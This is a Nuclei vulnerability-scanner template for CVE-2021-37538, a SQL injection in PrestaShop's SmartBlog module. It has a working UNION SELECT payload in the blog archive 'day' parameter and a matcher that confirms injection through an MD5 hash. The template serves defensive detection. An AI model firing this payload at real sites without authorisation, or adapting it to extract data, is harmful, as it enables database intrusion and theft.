44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2021-37538
|
|
|
|
info:
|
|
name: PrestaShop SmartBlog <4.0.6- SQL Injection
|
|
author: whoever
|
|
severity: critical
|
|
description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.
|
|
remediation: |
|
|
Upgrade PrestaShop SmartBlog to version 4.0.6 or later to mitigate the SQL Injection vulnerability.
|
|
reference:
|
|
- https://blog.sorcery.ie/posts/smartblog_sqli/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-37538
|
|
- https://classydevs.com/free-modules/smartblog/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-37538
|
|
cwe-id: CWE-89
|
|
epss-score: 0.02618
|
|
epss-percentile: 0.89184
|
|
cpe: cpe:2.3:a:smartdatasoft:smartblog:*:*:*:*:*:prestashop:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: smartdatasoft
|
|
product: smartblog
|
|
framework: prestashop
|
|
tags: cve,cve2021,prestashop,smartblog,sqli
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "c5fe25896e49ddfe996db7508cf00534"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100dd0e06f133797270204db03cf7358dc88952281a6416c6b7a10dd3671ab9a05b0220373ff3ba6fead6246f35cecaa6bff2b96b2d76ce2458bd7cce8e13ec4bcb004f:922c64590222798bb761d5b6d8e72950 |